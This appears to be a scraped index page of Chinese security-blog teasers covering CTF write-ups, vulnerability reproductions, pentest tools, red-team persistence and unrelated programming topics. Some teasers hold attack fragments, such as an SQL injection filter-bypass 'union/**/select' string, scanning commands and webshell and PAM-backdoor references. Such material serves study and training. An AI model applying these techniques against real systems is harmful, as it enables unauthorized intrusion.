原题解题思路需要满足a表示一个大于6000000长度小于等于3的数，这就会用到科学计数法，例如1e9。 b需要md5值的倒数6位为8b184b。md5彩虹表可以通过获得cmd5破解范围-discuz密码破解,vBulletin/md5(phpbb3)。 c要是json格式，m键且不能是整数类…

漏洞指北-VulFocus靶场专栏-入门

漏洞指北-VulFocus靶场01-入门 VulFocus靶场前置条件：入门001 命令执行漏洞step1： 输入默认index的提示step2： 入门002 目录浏览漏洞step1：进入默认页面，找到tmp目录step2 进入tmp目录获取flag文件 VulFocus靶场前置条…

HVV爆火漏洞：最新 WPS RCE (远程命令执行) 复现

最近HVV爆出的很火的WPS命令执行漏洞，其实并不是0DAY，早在2019年就出现了，只不过最近EXP才公开。接下来我们来复现一遍。 0x00 影响版本 WPS Office 2023 个人版 < 11.1.0.15120WPS Office 2019 企业版 < 11.8.2.12085 0x01 环境配置…

安全防护产品对接流程讲解

服务器被攻击了，怎么对接高防产品呢，需要提供什么？ 1、配置转发规则：提供域名、IP、端口，由专业技术人员为您配置转发协议/转发端口/源站IP等转发规则，平台会分配该线路独享高防IP。 2、修改DNS解析&…

Positive Technologies 专家帮助修复 Western Digital 网络存储设备中的一个危险漏洞

Positive Technologies 专家帮助修复 Western Digital 网络存储设备中的一个危险漏洞经过验证的攻击者可利用该漏洞在受攻击的设备上注入恶意软件并远程访问文件 Western Digital 感谢 Positive Technologies 专家 Nikita Abramov 发现 Western Digital NAS 固件中的一个漏洞…

2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)

文章目录前言0x01 Sxf-报表系统：版本有限制0x02 E-Cology 某版本 SQL注入漏洞：0x03 某恒明御运维审计与风险控制系统xmlrpc.sock任意用户添加漏洞0x04 泛微 E-Cology 某版本 SQL注入漏洞 POC：0x05 金和OA C6-GetSqlData.aspx RCE命令执行漏洞：(已确认)0x06 大华智慧园区综…

使用Aircrack-ng进行无线网络破解

Aircrack-ng是一款流行的无线网络渗透测试工具，主要用于密码破解和网络分析。但是，请注意，仅在有合法授权的情况下使用这些工具。以下是一个使用Aircrack-ng进行无线网络破解的示例，以及一些步骤和注意事项： 步骤&a…

Nmap扫描工具：详解每个关键参数的用途和意义

Nmap端口扫描 Nmap端口扫描目标规范：-iL 从一个文件中扫描主机列表--exclude 排除一些远程主机后再扫描--excludefile 排除文件中的列表端口扫描状态：open(开放的)closed(关闭的)filtered(被过滤的)unfiltered(未被过滤的)open|filtered(开放或者被过滤…

DHCP协议原理与应用

DHCP协议原理与应用一、DHCP协议概述1.1、场景描述1.1.1、场景描述11.1.2、场景描述21.1.3、场景描述3 二、DHCP协议工作原理2.1、DHCP简介2.2、DHCP协议名词解释2.3、DHCP服务器配置2.4、PC的DHCP设置2.5、DHCP协议工作过程2.6、DHCP协议报文及用途2.7、DHCP报文介绍2.7.1、D…

Linux权限维持—OpenSSHPAM后门SSH软连接公私钥登录

Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录 1. SSH—PAM后门1.1. 整体流程1.2. 操作演示1.2.1. 查看PAM版本1.2.2. 下载对应版本1.2.2.1. 解压 1.2.3. 安装依赖1.2.4. 修改配置1.2.4.1. 配置内容1.2.4.2. 编译安装1.2.4.3. 备份配置 1.2.5. 连接测试1.2…

春秋云镜：CVE-2020-21650（MyuCMS后台rce）

一、题目靶标介绍： MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合，插件，模板，轻便快捷容易扩展其2.2版本中admin.php/config/add方法存在任意命令执行漏洞. 进入题目： exp： url/index.p…

Weblogic漏洞（一）之 Weblogic基本介绍

Weblogic基本介绍 WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise…

功能强大的网站检测工具Web-Check

什么是 Web-Check ？ Web-Check是一款功能强大的一体化工具，用于查找有关网站/主机的信息。目前仪表版上可以显示：IP 信息、SSL 信息、DNS 记录、cookie、请求头、域信息、搜索爬虫规则、页面地图、服务器位置、开放端口、跟踪路由、DNS 安全扩…

XSS攻击是怎么回事？记录一下

title: XSS攻击 date: 2023-08-27 19:15:57 tags: [XSS, 网络安全] categories: 网络安全今天学习了一个网络攻击的手段，XSS攻击技术，大家自建网站的朋友，记得看看是否有此漏洞。 🎈 XSS 攻击全称跨站脚本攻击 Cross Site Sc…

黑客炼成手册

一、什么是网络安全？什么是黑客？ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等…

BUUCTF [SWPU2019]Web1

这是一道sql二次注入题目，但是注入点并不在登录处注册一个用户然后登录广告申请处进行sql注入你会发现过滤了很多关键字空格#information等等这里用到了一些绕过技巧使用 /**/ 代替空格 union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1…

内网穿透——搭建私人影音媒体平台

文章目录 1. 前言2. Jellyfin服务网站搭建2.1. Jellyfin下载和安装2.2. Jellyfin网页测试 3.本地网页发布3.1 cpolar的安装和注册3.2 Cpolar云端设置3.3 Cpolar本地设置 4.公网访问测试5. 结语 1. 前言随着移动智能设备的普及，各种各样的使用需求也被开发出来&…

RHCE——九、SELinux

SELinux 一、概念1、作用2、SELinux与传统的权限区别二、SELinux工作原理1、名词解释主体（Subject）目标（Object）策略（Policy）安全上下文（Security Context） 2、文件安全上下文查看1…

dig批量域名逆向查询ip

dig批量域名逆向查询ip dig nocmd noall answer -f iplist.txtiplist.txt中内容效果图： dig其他选项参数： dig www.baidu.com A # 查询A记录，如果域名后面不加任何参数，默认查询A记录 dig www.baidu.com MX # 查询MX记…

CTFhub-文件上传-无验证

怎样判断一个网站是 php asp jsp 网站首先，上传用哥斯拉生成 .php 文件然后，用蚁剑测试连接找到 flag_1043521020.php 文件，进去，即可发现 flag ctfhub{ee09842c786c113fb76c5542}

【案例分享】接入层设备安全配置

关注微信公众号：厦门微思网络接入层设备安全配置案例接入层作为园区网络的边界，为各种终端接入网络，需要防止非法的终端和用户进入网络。此外，接入层设备还承载二层流量转发的功能，需要对二层流量的转发行为进行控制…

CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析

CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析漏洞简介 Windows错误报告服务在提交错误报告前会创建wermgr.exe进程，而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程，从而以system权限执行代码。影响版本 Windows10 1507 * Wind…

企业网络安全：威胁情报解决方案

什么是威胁情报威胁情报是网络安全的关键组成部分，可为潜在的恶意来源提供有价值的见解，这些知识可帮助组织主动识别和防止网络攻击，通过利用 STIX/TAXII 等威胁源，组织可以检测其网络中的潜在攻击，从而促进快速检测…

什么是网络取证（Network Forensics）

企业采用新技术来检查其网络安全是否存在零日漏洞，与立即指示问题的物理层不同，黑客攻击尝试可能会被忽视并变得严重，直到对网络流量有一个整体的可见性。通过实时监控来跟踪其源和目标的流量，以查明问题或潜在问题的根源。什么…

com.squareup.okhttp3:okhttp 组件安全漏洞及健康度分析

组件简介维护者square组织许可证类型Apache License 2.0首次发布2016 年 1 月 2 日最新发布时间2023 年 4 月 23 日GitHub Star44403GitHub Fork9197依赖包5,582依赖存储库77,217 com.squareup.okhttp3:okhttp 一个开源的 HTTP 客户端库，可以用于 Android 和 Jav…

Vulnhub: Ragnar Lothbrok: 1靶机

kali：192.168.111.111 靶机：192.168.111.226 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.226 作者提示修改hosts文件目录爆破 gobuster dir -u http://armbjorn -w /usr/share/wordlists/dirbuster/directory-l…

2023年全国职业院校技能大赛高等职业教育组（信息安全管理与评估）正式赛题

全国职业院校技能大赛高等职业教育组 qq:2366046367 q群:670610200信息安全管理与评估任务书模块一网络平台搭建与设备安全防护一、比赛时间本阶段比赛时长为180分钟。二、赛项信息竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段网络平台搭建与设备安全防护 …

陇剑杯2023WriteUp学习笔记【初赛】

文章目录数据分析1、hard_webhard_web_1hard_web_2hard_web_3 2、sevrer savesevrer save_1sevrer save_2sevrer save_3sevrer save_4sevrer save_5sevrer save_6sevrer save_7sevrer save_8 3、WiresharkWireshark1_1Wireshark1_2Wireshark1_3Wireshark1_4 4、Incidentrespon…

文件包含漏洞实战

加粗样式文章目录漏洞原理特点利用方法包含图片木马读取敏感文件封装协议复现环境准备漏洞点代码审计验证漏洞点读取敏感文件文件包含漏洞文件上传漏洞深度利用中国蚁剑-getshell突破文件上传漏洞限制读取文件源码执行PHP命令远程文件包含文件包含漏洞防御本次测试仅供…

赛宁网安有力保障淮安市网络安全技能竞赛决赛

9月6日，由中共淮安市委网信办、淮安市总工会、淮安市人社局、淮安市教育局、淮安市公安局、共青团淮安市委共同主办，淮阴工学院协办，淮安市网络信息和数据安全协会、淮安市信息安全等级保护工作协调小组办公室承办，中国电信股份有…

python爬虫之正则表达式学习

网络安全离不开脚本和工具的开发，python很多又需要正则表达式。这是一个很好的学习正则表达式的项目 https://github.com/ziishaned/learn-regex/blob/master/translations/README-cn.md 基本匹配正则表达式其实就是在执行搜索时的格式，它由一些字…

永恒之黑_CVE-2020-0796漏洞复现

永恒之黑：CVE-2020-0796漏洞复现目录永恒之黑：CVE-2020-0796漏洞复现漏洞介绍漏洞影响范围漏洞复现1.环境准备2.复现过程漏洞介绍本漏洞源于SMBv3没有正确处理压缩的数据包，在解压数据包的时候使用客户端传过来的长度进行解压时&#xf…

1.网络空间搜素引擎

网络空间搜素引擎 https://cybermap.kaspersky.com/cn 世界所以带有ip的网络设备互联组成的空间叫做网络空间地址 ：shodan.io 简介 ： 这句话还是有点东西得。区别： 平常得搜素引擎主要搜网页，shadan可以搜所以带有ip地址…

攻防世界-What-is-this

原题解题思路解压后文件没有后缀，不知道是什么文件。用notepad打开找不到flag。尝试当成压缩包解压。用stegsolve以打开图片1， 合成两张图片。

万户协同办公平台ezoffice未授权访问漏洞

文章目录 0x01 前言0x02 漏洞描述0x03 影响范围0x04 漏洞环境0x05 漏洞复现1.构造POC2.进行MD5值解密3.尝试进行登录 0x06 复现建议 0x01 前言本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！&#…

【linux命令讲解大全】075. 网络数据包分析工具ngrep及其应用

文章目录 ngrep补充说明安装语法选项实例从零学 python ngrep 方便的数据包匹配和显示工具补充说明 ngrep 命令是 grep 命令的网络版，它提供了更多的 grep 特性，用于搜索指定的数据包。由于安装 ngrep 需要使用 libpcap 库，因此它支持许…

Solidity 小白教程：10. 控制流，用 solidity 实现插入排序

Solidity 小白教程：10. 控制流，用 solidity 实现插入排序这一讲，我们将介绍solidity中的控制流，然后讲如何用solidity实现插入排序（InsertionSort），一个看起来简单，但实际上很容易…

2023年全国职业院校技能大赛信息安全管理与评估网络安全事件响应、数字取证调查、应用程序安全任务书

全国职业院校技能大赛高等职业教育组信息安全管理与评估任务书模块二网络安全事件响应、数字取证调查、应用程序安全比赛时间及注意事项本阶段比赛时长为180分钟，时间为13:30-16:30。【注意事项】比赛结束，不得关机；选手首先需要…

com.google.guava:guava 组件安全漏洞及健康分析

组件简介维护者google组织许可证类型Apache-2.0首次发布2010 年 4 月 26 日最新发布时间2023 年 8 月 1 日GitHub Star48189GitHub Fork10716依赖包28,694依赖存储库219,576 Guava 是 Google 的一组核心 Java 库，其中包括新的集合类型（例如 multimap 和…

渗透测试漏洞原理之---【任意文件读取漏洞】

文章目录 1、概述1.1、漏洞成因1.2、漏洞危害1.3、漏洞分类1.4、任意文件读取1.4.1、文件读取函数1.4.2、任意文件读取 1.5、任意文件下载1.5.1、一般情况1.5.2、PHP实现1.5.3、任意文件下载 2、任意文件读取攻防2.1、路径过滤2.1.1、过滤../ 2.2、简单绕过2.2.1、双写绕过2.2.…

渗透测试漏洞原理之---【任意文件包含漏洞】

文章目录 1、文件包含概述1.1 文件包含语句1.1.1、相关配置 1.2、动态包含1.2.1、示例代码1.2.2、本地文件包含1.2.3、远程文件包含 1.3、漏洞原理1.3.1、特点 2、文件包含攻防2.1、利用方法2.1.1、包含图片木马2.1.2、读取敏感文件2.1.3、读取PHP文件源码2.1.4、执行PHP命令2.…

Vulnhub内网渗透DC-7靶场通关

个人博客: xzajyjs.cn DC系列共9个靶场，本次来试玩一下一个 DC-7，下载地址。下载下来后是 .ova 格式，建议使用vitualbox进行搭建，vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式，桥接模式可能会造成目标过多不…

深入理解Python中的多进程和多线程

前言此篇文章将深入的讲解Python中的多进程和多线程 📝个人主页→数据挖掘博主ZTLJQ的主页个人推荐python学习系列： ☄️爬虫JS逆向系列专栏 - 爬虫逆向教学 ☄️python系列专栏 - 从零开始学python 第一部分：多进程多进程是指在操作系统中…

安全攻防基础以及各种漏洞库

安全攻防基础以及各种漏洞库信息搜集企业信息搜集1. 企业架构2. ICP备案查询，确定目标子域名3. 员工信息（搜集账号信息、钓鱼攻击）4. 社交渠道域名信息搜集IP搜集信息泄露移动端搜集打点进内网命令和控制（持续控制）穿…

一文了解tcp/ip协议的运行原理

接触代理ip的人都了解https/sock5等ip协议，那么TCP/IP 协议又是什么？ 一、什么是TCP/IP 协议？ TCP/IP 协议实际上是一系列网络通信协议的一个统称，他负责具体的数据传输工作，核心的两个协议包括TCP以及IP&#xff0c…

frida动态调试入门02——hook加密函数

说明 frida是一款Python工具可以方便对内存进行hook修改代码逻辑在移动端安全和逆向过程中常用到。前置知识 frida动态调试入门01——定位关键代码 https://blog.csdn.net/qq_41690468/article/details/132607065 定位函数关键函数 String code RequestUtil.paraMap(ad…

渗透测试漏洞原理之---【失效的访问控制】

文章目录 1、失效的访问控制1.1、OWASP Top 101.1.1、A5:2017-Broken Access Control1.1.2、A01:2021 – Broken Access Control 1.2、失效的访问控制类别1.2.1、水平越权1.2.2、垂直越权 1.3、攻防案例1.3.1、Pikachu靶场 Over Permision1.3.2、DVWA越权利用失效的访问控制漏洞…

HVV行动之态势感知平台（一）

知攻善防，遇强则强！ 先介绍一下什么是HVV行动： 它是由公安部牵头的，通过组织红队和蓝队进行为期两周到三周的攻防对抗演习，来检测一些企业单位可能存在的网络漏洞和威胁，进而进行修复和加固，提…

Solidity 小白教程：6. 引用类型, array, struct

Solidity 小白教程：6. 引用类型, array, struct 这一讲，我们将介绍solidity中的两个重要变量类型：数组（array）和结构体（struct）。数组 array 数组（Array）是solidity常…

CVE-2023-25157：GeoServer OGC Filter SQL注入漏洞复现

CVE-2023-25157：GeoServer OGC Filter SQL注入漏洞复现前言本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！ 一.GeoServer简介 GeoServer 是用 Java 编写的开源软件服务…

简单了解ICMP协议

目录一、什么是ICMP协议？ 二、ICMP如何工作？ 三、ICMP报文格式四、ICMP的作用五、ICMP的典型应用 5.1 Ping程序 5.2 Tracert(Traceroute)路径追踪程序一、什么是ICMP协议？ ICMP因特网控制报文协议是一个差错报告机制，…

【包过滤防火墙-iptables】的简单使用

文章目录规则链的分类--五链处理的动作iptables常用参数和作用防火墙就是堵和通的作用 iptables ：包过滤防火墙，是内核防火墙netfilter的管理工具核心：四表五链规则链的分类–五链在进行路由选择前处理的数据包：PREROUTIN…

红日靶场五（vulnstack5）渗透分析

环境搭建 win7 192.168.111.132（仅主机） 192.168.123.212（桥接） .\heart p-0p-0p-0win2008 ip: 192.168.111.131（仅主机） sun\admin 2020.comkali ip: 192.168.10.131（nat）vps&…

取证工具prodiscover的基本操作

前言提醒取证工具ProDiscover在网上讲解操作的文章实在太少，一是prodiscover是用于磁盘取证的工具，本身比较小众比不上其他的编程软件能用到的地方多，二是这个工具是用来恢复提取磁盘中被删除的文件，是比较隐晦的软件。需要注…

HTTP协议详解：基本概念与工作流程

个人主页：insist--个人主页本文专栏：网络基础——带你走进网络世界本专栏会持续更新网络基础知识，希望大家多多支持，让我们一起探索这个神奇而广阔的网络世界。目录一、HTTP协议的基本概念二、HTTP协议的主要特点</

【个人博客系统网站】注册与登录 · 加盐加密验密算法 · 上传头像

【JavaEE】进阶个人博客系统（3） 文章目录【JavaEE】进阶个人博客系统（3）1. 加盐加密验密算法原理1.1 md5加密1.2 md5验密1.3 md5缺漏1.4 加盐加密1.5 后端的盐值拼接约定1.6 代码实现1.6.1 加密1.6.2 验密1.6.3 测试 2. 博客…

内网隧道代理技术（二十一）之 CS工具自带中转技术上线不出网机器

CS工具自带上线不出网机器如图A区域存在一台中转机器，这台机器可以出网，这种是最常见的情况。我们在渗透测试的过程中经常是拿下一台边缘机器，其有多块网卡，边缘机器可以访问内网机器，内网机器都不出网。这种情况下拿这个边缘机器做中转，就可以使用CS工具自带上线不出网…

跨站请求伪造（CSRF）攻击与防御原理

跨站请求伪造（CSRF） 1.1 CSRF原理 1.1.1 基本概念跨站请求伪造（Cross Site Request Forgery，CSRF）是一种攻击，它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击&a…

ToBeWritten之ATTCK 场景实践

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

dc-4靶机渗透

1.信息搜集，扫描存活主机，扫描端口，服务,发现开放80，22端口，cms没有看到 nmap 192.168.85.0/24 nmap -p1-66535 192.168.85.175 nmap -sv 192.168.85.1752.访问网站，发现登录框，根据提示&#…

自学黑客（网络安全）看这篇就够了

写了这么多编程环境和软件安装的文章，还有很多小伙伴在后台私信说看不懂。我都有点头疼了，但是小伙伴们求学的心情我还是能理解，竟然这么多人给我反馈了，那我就再写一篇网络安全自学的教程吧！大家耐心看完，…

IPSEC扩展总结

文章目录一、根据以下问题总结当天内容1.什么是数据认证，有什么作用，有哪些实现的技术手段?2.什么是身份认证，有什么作用，有哪些实现的技术手段?3.什么VPN技术?4.VPN技术有哪些分类?5.IPSEC技术能够提供哪些安全服务?6.IPSEC…

网络安全怎么学？

一、怎么入门？ 这个 Web 安全学习路线，整体大概半年左右，具体视每个人的情况而定。 （上传一直很模糊，所以就没有展开了，需要高清版的可以在下面领取） 👉 【一学习路线高清版一】&a…

勒索病毒“顽疾”，没有“特效药”吗？

基础设施瘫痪、企业和高校重要文件被加密、毕业论文瞬间秒没……这就是六年前的今天，WannaCry勒索攻击爆发时的真实场景。攻击导致150多个国家数百万台计算机受影响，也让勒索病毒首次被全世界广泛关注。六年后，勒索攻击仍是全球最严重的网络…

DC:4通关详解

信息收集漏洞发现访问web 尝试弱口令账号admin 可以执行ls du df看看发的包,我们是否有机会执行任意命令发现post传参radio处可以任意命令执行弹个shell先提权从vps上下载LinEnum.sh来枚举脆弱性优化shell 现在shell就有自动补齐了在/home/jim下发现密码字典…

答题积分小程序云开发实战-开篇：项目介绍以及效果图

答题积分小程序云开发实战开篇：项目介绍以及效果图前言我也看过不少的册子或者文章，大部分都很优秀，但也有的就长篇累牍，从时代背景讲起，复述各种基本概念、底层原理......嗯，看似很高级~ 但我阅读的时候，给我的感觉是，把你绕晕、把你劝退的感觉，相信大家都有同感，…

网络安全四大合规-“3保1评”

网络安全四大合规-“3保1评” 文章目录网络安全四大合规-“3保1评”等保法律依据等级保护制度-术语解释等级保护制度-责任义务等级保护制度-对应罚则指导意见标准规范等保的级别分保法律依据分保的级别关保法律依据关保的发展关保的内容密评法律依据密评的发展密评的对象4…

内网渗透(六十九)之域权限维持之SID History 滥用

域权限维持之SID History 滥用 SID是用于标识主体的可变长度的唯一值，每个账户都有一个系统颁发的唯一SID，其存储在数据库（域中的话就存储在活动目录数据库中）。用户每次登录时，系统都会从数据库中检索该用户的SID，并将其放在该用户的访问令牌中。系统使用访问令牌中的S…

网络安全面试题合集

以下为网络安全各个方向涉及的面试题，星数越多代表问题出现的几率越大，祝各位都能找到满意的工作。注：本套面试题，已整理成pdf文档，但内容还在持续更新中，因为无论如何都不可能覆盖所有的面试问题&#xf…

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947） 0x00 前言 Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问…

网络安全：Hydra 端口爆破工具.（九头蛇）

网络安全：Hydra 端口爆破工具.（九头蛇） Hydra 也叫九头蛇，是一款开源的暴力PJ工具，集成在kali当中。可以对多种服务的账号和密码进行爆破，包括 Web 登录、数据库、SSH、FTP 等服务. 目录： 网络…

网络安全必学渗透测试流程

这个靶场是一个对渗透新手很友好的靶场。而且，该靶场包含了渗透测试的信息收集，漏洞利用和权限提升的全过程，对新手理解渗透测试的流程有很好的帮助。靶场地址：https://hackmyvm.eu/machines/machine.php?vmHundred 靶场基本情…

腾讯安全助力高校信息安全建设，护航湾区教育高质量发展

2023年4月20日-21日，首届大湾区信息网络安全大会在广州市长隆国际会展中心隆重召开。会议以“同筑安全屏障，共赢湾区未来”为主题，旨在响应国家安全战略，推动粤港澳大湾区信息网络安全的建设和发展，保障经济社会稳定运…

内网渗透(CS与MSF联动) ATTCK实战系列一红队实战（一）

靶场下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑图环境配置 win7网络配置情况: 外网内网域网络 Win2K3网络配置情况: 内网域网络 win2008(域控)网络配置情况: 内网域网络渗透过程开始之前，先到win7上开启phpstudy 打开网页&#…

2023年安全岗秋招经验分享，纯干货，建议收藏！

需要准备的几个方向简历自我介绍计算机网络操作系统（操作系统原理，Linux，Windows）数据库算法（Leetcode）编程语言（Python,C,go等）安全知识（很多很杂，建议根据…

ActiveMQ 反序列化漏洞（CVE-2015-5254）漏洞复现

当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场（所有实验均为虚拟环境） 实验环境：攻击机----kali 靶机：centos7 需要的jar包：jmet-0.1.0-all.jar 1、启动docker，进入vulhub（靶机&#xff0…

Fortinet FortiNAC RCE漏洞复现(CVE-2022-39952)

0x01 产品简介 FortiNAC(Network Access Control) 是Fortinet的一种零信任网络访问控制解决方案，可增强用户对企业网络上的物联网 (IoT) 设备的监控。NAC 是零信任网络访问安全模型的重要组成部分，在该模型中，IT 团队可以轻松了解正在访问网络…

无状态子域名爆破工具（附下载）

ksubdomain是一款基于无状态子域名爆破工具，支持在Windows/Linux/Mac上使用，它会很快的进行DNS爆破，在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。总的来说，ksubdomain能爆破/验证域名，并且快和…

[网络安全]XSS之Cookie外带攻击姿势及例题详析

[网络安全]XSS之Cookie外带攻击姿势及例题详析概念姿势及Payload启动HTTP协议 method1启动HTTP协议 method2 例题详析Payload1Payload2window.open 总结本文仅分享XSS攻击知识，不承担任何法律责任。本文涉及的软件等请读者自行安装，本文不再赘述。概…

KIOPTRIX: LEVEL 4通关详解

环境配置 vulnhub上下载的文件没有vmx 去3的文件里偷一个记事本打开把所有Kioptrix3_vmware改成Kioptrix4_vmware 然后网卡地址随便改一下打开后会提示找不到虚拟机,手动选一下就行了信息收集漏洞发现 web一上去就是一个登录框扫路径发现database.sql 但是密码是错的…

ATTCK v13版本战术介绍——防御规避（六）

一、引言在前几期文章中我们介绍了ATT&CK中侦察、资源开发、初始访问、执行、持久化、提权战术理论知识及实战研究、部分防御规避战术，本期我们为大家介绍ATT&CK 14项战术中防御规避战术第31-36种子技术，后续会介绍防御规避其他子技术&#xf…

安全响应中心 — 垃圾邮件事件报告（5.16）

2023年5月第二周一. 样本概况 ✅ 类型1：二维码钓鱼(QRPhish) 利用二维码进行的钓鱼、投毒，成为目前常见的邮件攻击手段之一，该类二维码主要存在于网络链接图片、邮件内容图片、附件图片中。近日，安全团队捕获到一类基于员工…

零基础入门网络安全必看书单（附电子书籍+配套资料）

学习的方法有很多种，看书就是一种不错的方法，但为什么总有人说：“看书是学不会技术的”。其实就是书籍没选对，看的书不好，你学不下去是很正常的。一本好书其实不亚于一套好的视频教程，尤其是经典的好书…

CISSP和Security+的区别和学习建议

当谈到网络安全认证时，经常有朋友问我CISSP 与 Security认证。两者都是业内比较认可，对实际工作有所帮助的认证，但是哪一个适合自己呢，区别又是什么呢？ 在深入研究细节之前，让我们先简要了解一下 CISSP 与 …

进攻即是最好的防御！19个练习黑客技术的在线网站

前言进攻即是最好的防御，这句话同样适用于信息安全的世界。这里罗列了19个合法的来练习黑客技术的网站，不管你是一名开发人员、安全工程师、代码审计师、渗透测试人员，通过不断的练习才能让你成为一个优秀安全研究人员。以下网站希望能给各…

2022东南大学网安916专硕上岸经验帖

本文目录第一部分简单介绍我的一些选择第二部分寒假大三下学期小学期暑假及大四上学期考前准备及考试过程考后估分与真实分数复试准备与复试过程复试结果导师选择经验对自己考研情况的评价一些建议第一部分简单介绍最近忙完了毕业设计论文和教师资格证面试，终…

【HackTheBox Bagel】打靶记录

一、namp扫描到5000 8000 22 端口二、访问8000端口，看到跳转到域名bagel.htb，加入到hosts 看到该url 像文件包含，尝试fuzz一波尝试找公私钥均未果，找到了cmdline 进一步对其包含 HTTP/1.1 200 OK Server: Werkzeug/2.2.2 …

内网渗透(六十四)之CVE-2020-1472 NetLogon 权限提升漏洞

CVE-2020-1472 NetLogon 权限提升漏洞漏洞背景在2020年8月份微软发布的安全公告中，有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞，未经身份验证的攻击者只需要能访问域控的135端口即可通过 NetLogon 远程协议连接域控并重置域控机器的Hash，…

零基础学习网络安全这一块，请问有哪些相关资料可以推荐一下？

一、相关网站推荐 1、FreeBuf 国内关注度最高的全球互联网安全媒体平台，爱好者们交流与分享安全技术的社区，网络安全行业门户。 2、看雪看雪论坛是个软件安全技术交流场所，为安全技术爱好者提供一个技术交流平台和资源。 3、吾爱破解吾爱破解…

又双叒叕入选！腾讯安全NDR连续四年获Gartner认可

近日，全球权威研究机构 Gartner发布了2023年《Emerging Tech: Security — Adoption Growth Insights for Network Detection and Response》（《新兴技术：安全-网络检测与响应的采用增长洞察》），腾讯安全连续四年被列为…

为什么大部分企业都选择加密软件来防止数据泄露？

加密软件是使用加密算法对数据或信息进行编码转换的软件，目的是防止未授权访问与保护敏感内容。它是实现加密技术的重要手段，为用户提供了简单易用的加解密功能，无需深入了解复杂的数学原理。加密软件使用的加密算法通常采用对称与非对称算法…

红队工具合集

一个 Red Team 攻击的生命周期，整个生命周期包括： 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析（在这个基础上再做持久化控制）、在所有攻击结束之后清理并退出战场。相资信息搜集 http…

网络安全CTF工具合集

各种在线工具以及工具整合 CTF资源库|CTF工具下载|CTF工具包|CTF工具集合逆向工程: GDB – http://www.gnu.org/software/gdb/download/ IDA Pro – Download center Immunity Debugger – http://debugger.immunityinc.com/ OllyDbg – OllyDbg v1.10 radare2 – radare Hop…

黑客入门指南，学习黑客必须掌握的技术

黑客一词，原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。是一个喜欢用智力通过创造性方法来挑战脑力极限的人，特别是他们所感兴趣的领域，例如电脑编程等等。提起黑客，总是那么神秘莫测。…

2023最全CTF入门指南（建议收藏）

目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线 4.1、初期 1、htmlcssjs（2-3天） 2、apachephp （4-5天） 3、mysql （2-3天） 4、python (2-3天) 5、burpsuite （…

服务端请求伪造(SSRF)及漏洞复现

文章目录渗透测试漏洞原理服务端请求伪造1. SSRF 概述1.1 SSRF 场景1.1.1 PHP 实现 1.2 SSRF 原理1.3 SSRF 危害 2. SSRF 攻防2.1 SSRF 利用2.1.1 文件访问2.1.2 端口扫描2.1.3 读取本地文件2.1.4 内网应用指纹识别2.1.5 攻击内网Web应用 2.2 SSRF 经典案例2.2.1 访问页面2.2.…

网络安全—0基础入门学习手册

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

文件上传漏洞学习小结

目录一、漏洞简介二、上传的原理或本质 2.1 文件上传的本质 2.2 文件上传的过程及代码演示三、文件上传常见触发点四、文件上传常见检测方式 4.1 前端js检测 4.2 content-type （MIME）检测 4.3 黑名单检测 4.4 文件头检测 4.5 .htaccess文件…

web靶场——xss-labs靶机平台的搭建和代码审计

目录一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1：8088进入靶场二、xss-labs靶场通关攻略第一关： 1、输入代码进行测试&#xf…

SSRF服务端请求伪造

服务端请求伪造，其实就是攻击者构造恶意请求，服务端发起恶意请求，如果服务端不对用户传递的参数进行严格的过滤和限制，就可能导致服务端请求伪造上面是百度识图，我们可以传递图片地址，百度识图向图片发起…

Solidity 小白教程：8. 变量初始值

Solidity 小白教程：8. 变量初始值变量初始值在solidity中，声明但没赋值的变量都有它的初始值或默认值。这一讲，我们将介绍常用变量的初始值。值类型初始值 boolean: falsestring: “”int: 0uint: 0enum: 枚举中的第一个元素address: …

ToBeWritten之威胁狩猎

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

Solidity 小白教程：11. 构造函数和修饰器

